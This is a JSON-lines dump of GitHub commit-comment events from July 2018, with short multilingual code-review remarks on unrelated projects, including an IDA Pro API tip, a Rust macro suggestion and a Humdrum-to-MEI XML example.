{"id":"7981270807","type":"CommitCommentEvent","actor":{"login":"belkacem77"},"repo":{"name":"belkacem77/tuddar"},"payload":{"comment":{"id":29745519,"position":null,"line":null,"path":null,"commit_id":"20d02c230853ea646af9d94f1664b851651d43b0","created_at":"2018-07-18T07:58:41Z","updated_at":"2018-07-18T07:58:41Z","author_association":"OWNER","body":"ok, don't worry about it. Just to organize things here. Everyone with one directory to manage better the corpora"}},"created_at":"2018-07-18T07:58:41Z"}
{"id":"7981272720","type":"CommitCommentEvent","actor":{"login":"forsaken1"},"repo":{"name":"raptorggi/testApp"},"payload":{"comment":{"id":29745526,"position":9,"line":8,"path":"app/controllers/products_controller.rb","commit_id":"6e8092a48ca15eb0ba40e22014118085b2bbcc49","created_at":"2018-07-18T07:59:06Z","updated_at":"2018-07-18T07:59:06Z","author_association":"COLLABORATOR","body":"зачем убрал поиск от категории? это лишает смысла роутинг /products/cat slug/prod slug"}},"created_at":"2018-07-18T07:59:06Z"}
{"id":"7981274806","type":"CommitCommentEvent","actor":{"login":"antyray"},"repo":{"name":"antyray/antyhexu.github.io"},"payload":{"comment":{"id":29745532,"position":null,"line":null,"path":null,"commit_id":"0e9f74f8404ae0146655e0d2a9d51dc7a3e745d8","created_at":"2018-07-18T07:59:32Z","updated_at":"2018-07-18T07:59:32Z","author_association":"OWNER","body":"hello word### **发热热非人非**"}},"created_at":"2018-07-18T07:59:32Z"}
{"id":"7981276222","type":"CommitCommentEvent","actor":{"login":"FamousMai"},"repo":{"name":"FamousMai/laravel01"},"payload":{"comment":{"id":29745537,"position":null,"line":null,"path":null,"commit_id":"a4b6054af33b2a2a7631085e84be0f177b514452","created_at":"2018-07-18T07:59:50Z","updated_at":"2018-07-18T07:59:50Z","author_association":"OWNER","body":"完成 第三章 构建页面"}},"created_at":"2018-07-18T07:59:50Z"}
{"id":"7981280905","type":"CommitCommentEvent","actor":{"login":"zombieJ"},"repo":{"name":"react-component/tabs"},"payload":{"comment":{"id":29745552,"position":null,"line":null,"path":null,"commit_id":"1194be5232ce79d0e66af102519e033bcadccc9f","created_at":"2018-07-18T08:00:40Z","updated_at":"2018-07-18T08:00:40Z","author_association":"MEMBER","body":"https://github.com/ant-design/ant-design/issues/11261"}},"created_at":"2018-07-18T08:00:40Z"}
{"id":"7981287867","type":"CommitCommentEvent","actor":{"login":"MFernandezCarmona"},"repo":{"name":"LCAS/depth_sensors"},"payload":{"comment":{"id":29745567,"position":null,"line":null,"path":null,"commit_id":"a1b79a3b07584c8891c1bde38e4cea398ba1f618","created_at":"2018-07-18T08:02:09Z","updated_at":"2018-07-18T08:02:09Z","author_association":"COLLABORATOR","body":"Done!"}},"created_at":"2018-07-18T08:02:09Z"}
{"id":"7981289850","type":"CommitCommentEvent","actor":{"login":"Cairo2k18"},"repo":{"name":"Cairo2k18/jackbot"},"payload":{"comment":{"id":29745573,"position":null,"line":null,"path":null,"commit_id":"ec2861fdadf28730612ccff8248711d147377231","created_at":"2018-07-18T08:02:34Z","updated_at":"2018-07-18T08:02:34Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [donator perks](https://trello.com/c/WdL496Bm/33-donator-perks)"}},"created_at":"2018-07-18T08:02:34Z"}
{"id":"7981294666","type":"CommitCommentEvent","actor":{"login":"RoadRunnr"},"repo":{"name":"travelping/ergw"},"payload":{"comment":{"id":29745588,"position":null,"line":null,"path":null,"commit_id":"ca11e9046033b9ce22d4064f460c93f5962f2383","created_at":"2018-07-18T08:03:33Z","updated_at":"2018-07-18T08:03:33Z","author_association":"MEMBER","body":"again, unit test, please?"}},"created_at":"2018-07-18T08:03:33Z"}
{"id":"7981299389","type":"CommitCommentEvent","actor":{"login":"marekkopecky"},"repo":{"name":"tterem/Resteasy"},"payload":{"comment":{"id":29745598,"position":31,"line":31,"path":"testsuite/integration-tests/src/test/java/org/jboss/resteasy/test/resource/param/MultiValuedParamCdiTest.java","commit_id":"53fc5229194897e2048f1235448b317a508b45b4","created_at":"2018-07-18T08:04:34Z","updated_at":"2018-07-18T08:04:34Z","author_association":"NONE","body":"Is necessary to have application scoped annotation here?"}},"created_at":"2018-07-18T08:04:34Z"}
{"id":"7981303600","type":"CommitCommentEvent","actor":{"login":"joxeankoret"},"repo":{"name":"Somerset-Recon/blog"},"payload":{"comment":{"id":29745602,"position":null,"line":null,"path":null,"commit_id":"105a41b67c3342ebaa58bade787714ac37885038","created_at":"2018-07-18T08:05:26Z","updated_at":"2018-07-18T08:05:26Z","author_association":"NONE","body":"You don't need that non portable ```find_arg()``` function. Use the IDA API ```get_arg_addrs()```. For example, given this disassembly:\r\n\r\n```\r\n.text:00000000000389F5                 mov     rdi, [pCtx]     ; pMem\r\n.text:00000000000389F8                 lea     rsi, aStringOrBlobTo ; \"string or blob too big\"\r\n.text:00000000000389FF                 mov     dword ptr [pCtx+24h], 12h\r\n.text:0000000000038A06                 mov     byte ptr [pCtx+29h], 1\r\n.text:0000000000038A0A                 xor     r8d, r8d        ; xDel\r\n.text:0000000000038A0D                 mov     ecx, 1          ; enc\r\n.text:0000000000038A12                 mov     edx, 0FFFFFFFFh ; n\r\n.text:0000000000038A17                 call    sqlite3VdbeMemSetStr\r\n```\r\nCalling that API for the call at 0x38A17 will return the following:\r\n\r\n```\r\nPython>map(hex, idaapi.get_arg_addrs(here()))\r\n['0x389f5L', '0x389f8L', '0x38a12L', '0x38a0dL', '0x38a0aL']\r\n```\r\n"}},"created_at":"2018-07-18T08:05:26Z"}
{"id":"7981309443","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29745616,"position":null,"line":null,"path":null,"commit_id":"00990367a1e06dd0a4773c9a48f1c820f9c456bc","created_at":"2018-07-18T08:06:41Z","updated_at":"2018-07-18T08:06:41Z","author_association":"COLLABORATOR","body":"Please … time to revert this line and merge https://github.com/LimeSurvey/LimeSurvey/pull/1092"}},"created_at":"2018-07-18T08:06:41Z"}
{"id":"7981311093","type":"CommitCommentEvent","actor":{"login":"forsaken1"},"repo":{"name":"raptorggi/testApp"},"payload":{"comment":{"id":29745620,"position":5,"line":17,"path":"app/views/products/category.html.erb","commit_id":"6e8092a48ca15eb0ba40e22014118085b2bbcc49","created_at":"2018-07-18T08:07:03Z","updated_at":"2018-07-18T08:07:03Z","author_association":"COLLABORATOR","body":"можно использовать отдельную instance переменную для этого выражения"}},"created_at":"2018-07-18T08:07:03Z"}
{"id":"7981313476","type":"CommitCommentEvent","actor":{"login":"forsaken1"},"repo":{"name":"raptorggi/testApp"},"payload":{"comment":{"id":29745624,"position":5,"line":17,"path":"app/views/products/category.html.erb","commit_id":"6e8092a48ca15eb0ba40e22014118085b2bbcc49","created_at":"2018-07-18T08:07:32Z","updated_at":"2018-07-18T08:07:32Z","author_association":"COLLABORATOR","body":"даже лучше метод "}},"created_at":"2018-07-18T08:07:32Z"}
{"id":"7981317634","type":"CommitCommentEvent","actor":{"login":"VinodBh"},"repo":{"name":"VinodBh/TestGit"},"payload":{"comment":{"id":29745631,"position":null,"line":null,"path":null,"commit_id":"ccd51e42c9409d07074e4b7ea6d4920e3a4dd459","created_at":"2018-07-18T08:08:25Z","updated_at":"2018-07-18T08:08:25Z","author_association":"OWNER","body":"h comment updated"}},"created_at":"2018-07-18T08:08:25Z"}
{"id":"7981318728","type":"CommitCommentEvent","actor":{"login":"surenvithanage"},"repo":{"name":"hertzsoftware/mpcs_pujapitiya"},"payload":{"comment":{"id":29745633,"position":null,"line":null,"path":null,"commit_id":"b5a4ae1a94672857a172e3a7813e562360ba34b4","created_at":"2018-07-18T08:08:40Z","updated_at":"2018-07-18T08:08:40Z","author_association":"COLLABORATOR","body":"Kasun please check if there is an error in the last commit. Cause the stats the github is displaying seems in correct with respect to my perspective."}},"created_at":"2018-07-18T08:08:40Z"}
{"id":"7981320875","type":"CommitCommentEvent","actor":{"login":"dahlstrom-g"},"repo":{"name":"JetBrains/intellij-community"},"payload":{"comment":{"id":29745637,"position":12,"line":37,"path":"java/openapi/src/com/intellij/codeInsight/NullableNotNullDialog.java","commit_id":"1bd3a97d1f3731aa0f267b6d2c828a41c986c6a5","created_at":"2018-07-18T08:09:07Z","updated_at":"2018-07-18T08:09:07Z","author_association":"CONTRIBUTOR","body":"This appears to be the only use of sun.swing.table in the project. Is it intended?\r\n\r\nAs far as I can tell, this isn't supplied by any of the module dependencies."}},"created_at":"2018-07-18T08:09:07Z"}
{"id":"7981321277","type":"CommitCommentEvent","actor":{"login":"tameemsafi"},"repo":{"name":"dvsa/front-end"},"payload":{"comment":{"id":29745638,"position":6,"line":78,"path":"src/assets/scss/modules/dvsa-results-entry/_dvsa-results-entry.scss","commit_id":"d23ec0a03258745968e949034e8614d0b16d7b15","created_at":"2018-07-18T08:09:12Z","updated_at":"2018-07-18T08:09:12Z","author_association":"COLLABORATOR","body":"This branch is work in progress, you can remove/update anything you feel is not required."}},"created_at":"2018-07-18T08:09:12Z"}
{"id":"7981336460","type":"CommitCommentEvent","actor":{"login":"michaelarnauts"},"repo":{"name":"kfcpub/assistant-relay"},"payload":{"comment":{"id":29745672,"position":null,"line":null,"path":null,"commit_id":"b47a07059e31c302f109838a0a936bfb44a3d41e","created_at":"2018-07-18T08:12:23Z","updated_at":"2018-07-18T08:12:23Z","author_association":"NONE","body":"You should not commit this publicly!"}},"created_at":"2018-07-18T08:12:23Z"}
{"id":"7981345161","type":"CommitCommentEvent","actor":{"login":"SergeShkurko"},"repo":{"name":"crimson-education/serviceworker-webpack-plugin"},"payload":{"comment":{"id":29745692,"position":null,"line":null,"path":null,"commit_id":"5fbf0a51c94c11efa8a08faf9762ac99ae2493d0","created_at":"2018-07-18T08:14:07Z","updated_at":"2018-07-18T08:14:07Z","author_association":"NONE","body":"![image](https://user-images.githubusercontent.com/18213789/42868667-524db8ba-8a8c-11e8-9751-14577712c0c7.png)\r\nPackage unavailable in npm\r\nCan you publish?"}},"created_at":"2018-07-18T08:14:07Z"}
{"id":"7981347393","type":"CommitCommentEvent","actor":{"login":"ZeroITGeek"},"repo":{"name":"MatMoul/archfi"},"payload":{"comment":{"id":29745697,"position":null,"line":null,"path":null,"commit_id":"e9ef25986720be4355b887a91b18728e20147aa1","created_at":"2018-07-18T08:14:33Z","updated_at":"2018-07-18T08:14:33Z","author_association":"NONE","body":"this version does not appear in the script that one downloads to install, version that appears is 2017.12.4.01.50.04 (GPLV3) and there are problems installing with pacstrap at the end it falls and reports a problem with the GPGs."}},"created_at":"2018-07-18T08:14:33Z"}
{"id":"7981348140","type":"CommitCommentEvent","actor":{"login":"luluhongxu"},"repo":{"name":"luluhongxu/hongxu-master"},"payload":{"comment":{"id":29745700,"position":null,"line":null,"path":null,"commit_id":"f4f30b77f39d7382f0594f3a28d55e474ac0af2e","created_at":"2018-07-18T08:14:42Z","updated_at":"2018-07-18T08:14:42Z","author_association":"OWNER","body":"自动添加：版本验证报告： http://47.97.168.53:8080/job/job-c-sdk-report//152/artifact/c-sdk-report.html "}},"created_at":"2018-07-18T08:14:42Z"}
{"id":"7981358508","type":"CommitCommentEvent","actor":{"login":"JAborl"},"repo":{"name":"blackplusy/python"},"payload":{"comment":{"id":29745726,"position":null,"line":null,"path":null,"commit_id":"b3d3de9bed68dcbd023040d7d86268857d6315e1","created_at":"2018-07-18T08:16:51Z","updated_at":"2018-07-18T08:16:51Z","author_association":"NONE","body":"heygor handsome\r\n\r\n> \r\n\r\n> "}},"created_at":"2018-07-18T08:16:51Z"}
{"id":"7981361813","type":"CommitCommentEvent","actor":{"login":"MaksimsKlimanovics"},"repo":{"name":"MaksimsKlimanovics/WMS_Api"},"payload":{"comment":{"id":29745736,"position":4,"line":24,"path":"Controllers/BinController.cs","commit_id":"fab7a2f54a8698a482f1672abb3fd4857f4438dc","created_at":"2018-07-18T08:17:31Z","updated_at":"2018-07-18T08:17:31Z","author_association":"OWNER","body":"@GailisJanis kāda velna pēc te ir šis?"}},"created_at":"2018-07-18T08:17:31Z"}
{"id":"7981362693","type":"CommitCommentEvent","actor":{"login":"hassanahmed076"},"repo":{"name":"parthbkgadoya/Image-based-Human-Age-and-Gender-Estimation"},"payload":{"comment":{"id":29745741,"position":null,"line":null,"path":null,"commit_id":"6f2e9c50840d8dcf04f12c8725b30d7094b7422e","created_at":"2018-07-18T08:17:43Z","updated_at":"2018-07-18T08:17:43Z","author_association":"NONE","body":"can u please send me .mat files for this project code \r\n"}},"created_at":"2018-07-18T08:17:43Z"}
{"id":"7981366933","type":"CommitCommentEvent","actor":{"login":"ZachariahTheMagnificent"},"repo":{"name":"FinalL/chili_framework"},"payload":{"comment":{"id":29745752,"position":null,"line":null,"path":null,"commit_id":"ed6e53a6124d4686e6967457c849d16f5623ccb2","created_at":"2018-07-18T08:18:35Z","updated_at":"2018-07-18T08:18:35Z","author_association":"NONE","body":"Not leaving a blank line at the end of your text files 👎"}},"created_at":"2018-07-18T08:18:35Z"}
{"id":"7981368139","type":"CommitCommentEvent","actor":{"login":"kirvis250"},"repo":{"name":"Trinea/android-auto-scroll-view-pager"},"payload":{"comment":{"id":29745753,"position":null,"line":null,"path":null,"commit_id":"5c616f573e69105f103e96640796c9e72c088388","created_at":"2018-07-18T08:18:50Z","updated_at":"2018-07-18T08:18:50Z","author_association":"NONE","body":"`consumeTouch`. It's value is not defined...."}},"created_at":"2018-07-18T08:18:50Z"}
{"id":"7981371446","type":"CommitCommentEvent","actor":{"login":"ZachariahTheMagnificent"},"repo":{"name":"SlidyBat/SlidyEngine"},"payload":{"comment":{"id":29745756,"position":null,"line":null,"path":null,"commit_id":"4a55ed995b969348e6e592d66b1f72d1042abd38","created_at":"2018-07-18T08:19:32Z","updated_at":"2018-07-18T08:19:32Z","author_association":"NONE","body":"Not leaving a blank line at the end of your text files 👎"}},"created_at":"2018-07-18T08:19:32Z"}
{"id":"7981375843","type":"CommitCommentEvent","actor":{"login":"sathlan"},"repo":{"name":"mbaldessari/puppet-memcached"},"payload":{"comment":{"id":29745768,"position":null,"line":null,"path":null,"commit_id":"4aaa6feeacc14e70acc353c0c081189410f597e4","created_at":"2018-07-18T08:20:26Z","updated_at":"2018-07-18T08:20:26Z","author_association":"NONE","body":"LGTM, just a typo in the title \"bool parameter ti disable \" -> \"bool parameter to disable \""}},"created_at":"2018-07-18T08:20:26Z"}
{"id":"7981379748","type":"CommitCommentEvent","actor":{"login":"sathlan"},"repo":{"name":"mbaldessari/puppet-memcached"},"payload":{"comment":{"id":29745773,"position":null,"line":null,"path":null,"commit_id":"4aaa6feeacc14e70acc353c0c081189410f597e4","created_at":"2018-07-18T08:21:13Z","updated_at":"2018-07-18T08:21:13Z","author_association":"NONE","body":"Missing a test though, if you need help there you can ping me on irc."}},"created_at":"2018-07-18T08:21:13Z"}
{"id":"7981387122","type":"CommitCommentEvent","actor":{"login":"tterem"},"repo":{"name":"tterem/Resteasy"},"payload":{"comment":{"id":29745781,"position":31,"line":31,"path":"testsuite/integration-tests/src/test/java/org/jboss/resteasy/test/resource/param/MultiValuedParamCdiTest.java","commit_id":"53fc5229194897e2048f1235448b317a508b45b4","created_at":"2018-07-18T08:22:48Z","updated_at":"2018-07-18T08:22:48Z","author_association":"OWNER","body":"No, I put annotation here at first, but then found out it should be on the end-point and I forgot to delete it here"}},"created_at":"2018-07-18T08:22:48Z"}
{"id":"7981388151","type":"CommitCommentEvent","actor":{"login":"jjavierdguezas"},"repo":{"name":"xuopled/react-google-places-suggest"},"payload":{"comment":{"id":29745784,"position":null,"line":null,"path":null,"commit_id":"abe184e15d19d6799a99f0b06c0726b07270394b","created_at":"2018-07-18T08:23:00Z","updated_at":"2018-07-18T08:23:00Z","author_association":"CONTRIBUTOR","body":"@xuopled the date of release v3.5.0 in the CHANGELOG.md is not right"}},"created_at":"2018-07-18T08:23:00Z"}
{"id":"7981388160","type":"CommitCommentEvent","actor":{"login":"bowei-jbw"},"repo":{"name":"bowei-jbw/test1"},"payload":{"comment":{"id":29745785,"position":1,"line":1,"path":"hehe.js","commit_id":"8d8dd440f1594cc0aaaa3fdb31b3be4ea0779a2c","created_at":"2018-07-18T08:23:01Z","updated_at":"2018-07-18T08:23:01Z","author_association":"OWNER","body":"哦，no"}},"created_at":"2018-07-18T08:23:01Z"}
{"id":"7981388247","type":"CommitCommentEvent","actor":{"login":"nicolas-raoul"},"repo":{"name":"edouardhue/java-http-fluent"},"payload":{"comment":{"id":29745786,"position":4,"line":636,"path":"src/main/java/in/yuvi/http/fluent/Http.java","commit_id":"be5ed443c6a11b6323d5c462844ec29225d78279","created_at":"2018-07-18T08:23:02Z","updated_at":"2018-07-18T08:23:02Z","author_association":"NONE","body":"What is the purpose of removing this? Thanks!"}},"created_at":"2018-07-18T08:23:02Z"}
{"id":"7981422563","type":"CommitCommentEvent","actor":{"login":"coriolinus"},"repo":{"name":"exercism/rust"},"payload":{"comment":{"id":29745859,"position":118,"line":193,"path":"exercises/grep/tests/grep.rs","commit_id":"65431325a505c2bb0315a962f68ba463a3ff3555","created_at":"2018-07-18T08:29:50Z","updated_at":"2018-07-18T08:29:50Z","author_association":"CONTRIBUTOR","body":"You can also apply the same concatenation trick to help generate the expected data:\r\n\r\n```rust\r\nmacro_rules! set_up_test_case {\r\n    ($(#[$flag:meta])+ $test_case_name:ident(pattern=$pattern:expr, flags=[$($grep_flag:expr),*], files=[$($file:expr),+], expected=[$($expected:expr),*])) => {\r\n        // all the same stuff you already have in this case\r\n        }\r\n    };\r\n    ($(#[$flag:meta])+ $test_case_name:ident(pattern=$pattern:expr, flags=[$($grep_flag:expr),*], files=[$($file:expr),+], prefix_expected=[$($expected:expr),*])) => {\r\n        // mostly the same as the other case, but:\r\n        let expected = vec![$(concat!(stringify!($test_case_name), \"_\" ,$prefix_expected)),+];\r\n    };\r\n}\r\n```"}},"created_at":"2018-07-18T08:29:50Z"}
{"id":"7981429098","type":"CommitCommentEvent","actor":{"login":"AlexMozheiko"},"repo":{"name":"justmad1/js"},"payload":{"comment":{"id":29745877,"position":31,"line":31,"path":"Task 1 (Analog clocks)/script.js","commit_id":"0878629b3a436c658625c96c12c8264d7cc37395","created_at":"2018-07-18T08:31:03Z","updated_at":"2018-07-18T08:31:03Z","author_association":"COLLABORATOR","body":"В данном случае не критично, но лучше использовать метод addEventListener('input', clickHandlerFunc), т.к. он позволяет добавлять неограниченное число \"слушателей\". В то время как oninput является свойством элемента и может быть перезаписан при последующем использовании."}},"created_at":"2018-07-18T08:31:03Z"}
{"id":"7981431757","type":"CommitCommentEvent","actor":{"login":"alisey"},"repo":{"name":"wix/wix-ui"},"payload":{"comment":{"id":29745883,"position":67,"line":455,"path":"packages/wix-ui-core/src/components/TimePicker/TimePicker.tsx","commit_id":"6c231c669f27d20d0dda3cbfd92a6f1d689c5a1f","created_at":"2018-07-18T08:31:34Z","updated_at":"2018-07-18T08:31:34Z","author_association":"MEMBER","body":"There's no explanation in the PR, and I'm wondering why would we need this, since Input component already manages focus:\r\n* https://github.com/wix/wix-ui/blob/6c231c669f27d20d0dda3cbfd92a6f1d689c5a1f/packages/wix-ui-core/src/components/Input/Input.tsx#L130\r\n* https://github.com/wix/wix-ui/blob/6c231c669f27d20d0dda3cbfd92a6f1d689c5a1f/packages/wix-ui-core/src/components/Input/Input.tsx#L172"}},"created_at":"2018-07-18T08:31:34Z"}
{"id":"7981434940","type":"CommitCommentEvent","actor":{"login":"Ghost-017"},"repo":{"name":"Ghost-017/javascript.info-challenges"},"payload":{"comment":{"id":29745893,"position":null,"line":null,"path":null,"commit_id":"445a1d5eed15f7f9db7707c9a084b88246932096","created_at":"2018-07-18T08:32:13Z","updated_at":"2018-07-18T08:32:13Z","author_association":"OWNER","body":"Forgot to add 'use strict';"}},"created_at":"2018-07-18T08:32:13Z"}
{"id":"7981435764","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29745896,"position":null,"line":null,"path":null,"commit_id":"18ef6d2ac324cdff8fc53c2502b81c737cf362c6","created_at":"2018-07-18T08:32:22Z","updated_at":"2018-07-18T08:32:22Z","author_association":"CONTRIBUTOR","body":"This commit implements issue https://github.com/humdrum-tools/verovio-humdrum-viewer/issues/132\r\n\r\nExample:\r\n\r\n<img width=\"605\" alt=\"screen shot 2018-07-18 at 10 27 34 am\" src=\"https://user-images.githubusercontent.com/3487289/42869562-b25d7a36-8a75-11e8-823a-1d0b0fe76c33.png\">\r\n\r\nHumdrum input:\r\n\r\n```\r\n**kern\t**kern\r\n*clefF4\t*clefG2\r\n0BBB;<\t1A<;\r\n.\t1A<; 1F<\r\n=\t=\r\n0g>;<\t1ff;\r\n.\t1ff; 1dd\r\n==\t==\r\n*-\t*-\r\n!!!RDF**kern: < = below\r\n!!!RDF**kern: > = above\r\n```\r\n\r\nMEI output:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-18T10:32:24\" version=\"2.0.0-dev-0337215-dirty\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n        <extMeta>\r\n            <frames xmlns:humxml=\"http://www.humdrum.org/ns/humxml\">\r\n                <metaFrame n=\"9\" token=\"!!!RDF**kern: &lt; = below\" xml:id=\"loc9\">\r\n                    <frameInfo>\r\n                        <startTime float=\"16\" />\r\n                        <frameType>reference</frameType>\r\n                        <referenceKey>RDF**kern</referenceKey>\r\n                        <referenceValue>&lt; = below</referenceValue>\r\n                    </frameInfo>\r\n                </metaFrame>\r\n                <metaFrame n=\"10\" token=\"!!!RDF**kern: &gt; = above\" xml:id=\"loc10\">\r\n                    <frameInfo>\r\n                        <startTime float=\"16\" />\r\n                        <frameType>reference</frameType>\r\n                        <referenceKey>RDF**kern</referenceKey>\r\n                        <referenceValue>&gt; = above</referenceValue>\r\n                    </frameInfo>\r\n                </metaFrame>\r\n            </frames>\r\n        </extMeta>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000001943475896\">\r\n                <score xml:id=\"score-0000000773113202\">\r\n                    <scoreDef xml:id=\"scoredef-0000001351827987\" midi.bpm=\"400\">\r\n                        <staffGrp xml:id=\"staffgrp-0000000149859199\" symbol=\"brace\" barthru=\"true\">\r\n                            <staffDef xml:id=\"staffdef-0000001235578098\" clef.shape=\"G\" clef.line=\"2\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000001886440877\" />\r\n                            </staffDef>\r\n                            <staffDef xml:id=\"staffdef-0000000909319153\" clef.shape=\"F\" clef.line=\"4\" n=\"2\" lines=\"5\" />\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L1\" n=\"0\">\r\n                            <staff xml:id=\"staff-0000001496114875\" n=\"1\">\r\n                                <layer xml:id=\"layer-L1F2N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L3F2\" dur=\"1\" staff=\"2\" oct=\"3\" pname=\"a\" accid.ges=\"n\" />\r\n                                    <chord xml:id=\"chord-L4F2\" dur=\"1\">\r\n                                        <note xml:id=\"note-L4F2S1\" staff=\"2\" oct=\"3\" pname=\"a\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L4F2S2\" staff=\"2\" oct=\"3\" pname=\"f\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-0000000316681402\" n=\"2\">\r\n                                <layer xml:id=\"layer-L1F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L3F1\" dur=\"breve\" oct=\"1\" pname=\"b\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <fermata xml:id=\"fermata-L3F2\" staff=\"2\" startid=\"#note-L3F2\" place=\"above\" />\r\n                            <fermata xml:id=\"fermata-L4F2\" staff=\"2\" startid=\"#chord-L4F2\" place=\"above\" />\r\n                            <fermata xml:id=\"fermata-L3F1\" staff=\"2\" startid=\"#note-L3F1\" place=\"below\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L5\" right=\"end\">\r\n                            <staff xml:id=\"staff-L5F2N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L5F2N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L6F2\" dur=\"1\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                    <chord xml:id=\"chord-L7F2\" dur=\"1\">\r\n                                        <note xml:id=\"note-L7F2S1\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L7F2S2\" oct=\"5\" pname=\"d\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-L5F1N1\" n=\"2\">\r\n                                <layer xml:id=\"layer-L5F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L6F1\" dur=\"breve\" staff=\"1\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <fermata xml:id=\"fermata-L6F2\" staff=\"1\" startid=\"#note-L6F2\" place=\"above\" />\r\n                            <fermata xml:id=\"fermata-L7F2\" staff=\"1\" startid=\"#chord-L7F2\" place=\"above\" />\r\n                            <fermata xml:id=\"fermata-L6F1\" staff=\"1\" startid=\"#note-L6F1\" place=\"below\" />\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```"}},"created_at":"2018-07-18T08:32:22Z"}
{"id":"7981436171","type":"CommitCommentEvent","actor":{"login":"AlexMozheiko"},"repo":{"name":"justmad1/js"},"payload":{"comment":{"id":29745897,"position":19,"line":19,"path":"Task 1 (Analog clocks)/style.css","commit_id":"0878629b3a436c658625c96c12c8264d7cc37395","created_at":"2018-07-18T08:32:27Z","updated_at":"2018-07-18T08:32:27Z","author_association":"COLLABORATOR","body":"Для цветов лучше использовать hex-значения в полной форме (т.е. #000000 вместо black). Это позволит однозначно определить значение цвета."}},"created_at":"2018-07-18T08:32:27Z"}
{"id":"7981441807","type":"CommitCommentEvent","actor":{"login":"lostie"},"repo":{"name":"ministryofjustice/Claim-for-Crown-Court-Defence"},"payload":{"comment":{"id":29745909,"position":null,"line":null,"path":null,"commit_id":"f08729c230a8afb6b7a61c315febaee0ff186376","created_at":"2018-07-18T08:33:34Z","updated_at":"2018-07-18T08:33:34Z","author_association":"CONTRIBUTOR","body":"More information on this [here](https://github.com/bundler/bundler/issues/6537). Would be interesting to know what actual versions of:\r\n\r\n- rubygems\r\n- bundler\r\n- ruby\r\n- location of where the gems are being installed to\r\n\r\nare in use in Travis."}},"created_at":"2018-07-18T08:33:34Z"}
{"id":"7981443006","type":"CommitCommentEvent","actor":{"login":"AlexMozheiko"},"repo":{"name":"justmad1/js"},"payload":{"comment":{"id":29745911,"position":3,"line":6,"path":"Task 1 (Analog clocks)/index.html","commit_id":"6a0aa3f1e0f6c0ab69f5dc0096a02385d68bc5a4","created_at":"2018-07-18T08:33:49Z","updated_at":"2018-07-18T08:33:49Z","author_association":"COLLABORATOR","body":"Script следует подключать перед закрывающим </body>, чтобы он не блокировал отрисовку страницы. В <head></head> рекомедуется подключать только скрипты или сторонние библиотеки, отвечающие за построение DOM-дерева."}},"created_at":"2018-07-18T08:33:49Z"}
{"id":"7981445831","type":"CommitCommentEvent","actor":{"login":"AlexMozheiko"},"repo":{"name":"justmad1/js"},"payload":{"comment":{"id":29745916,"position":null,"line":null,"path":null,"commit_id":"6a0aa3f1e0f6c0ab69f5dc0096a02385d68bc5a4","created_at":"2018-07-18T08:34:22Z","updated_at":"2018-07-18T08:34:22Z","author_association":"COLLABORATOR","body":"По заданию все окей. Только в условии еще говорилось про задание секунд, а тебя только часы и минуты. Добавь этот функционал."}},"created_at":"2018-07-18T08:34:22Z"}
{"id":"7981446027","type":"CommitCommentEvent","actor":{"login":"cavedunissin"},"repo":{"name":"cavedunissin/iot-website-source"},"payload":{"comment":{"id":29745918,"position":null,"line":null,"path":null,"commit_id":"296f81a795c25052f200377ceac873ccfd4c444a","created_at":"2018-07-18T08:34:24Z","updated_at":"2018-07-18T08:34:24Z","author_association":"OWNER","body":"@ewpatton please help to check the updated pdf files - Codi Bot tutorials."}},"created_at":"2018-07-18T08:34:24Z"}
{"id":"7981446927","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29745919,"position":null,"line":null,"path":null,"commit_id":"00990367a1e06dd0a4773c9a48f1c820f9c456bc","created_at":"2018-07-18T08:34:36Z","updated_at":"2018-07-18T08:34:36Z","author_association":"CONTRIBUTOR","body":"Reverted. All this code will be replaced by Dominik's work later."}},"created_at":"2018-07-18T08:34:36Z"}
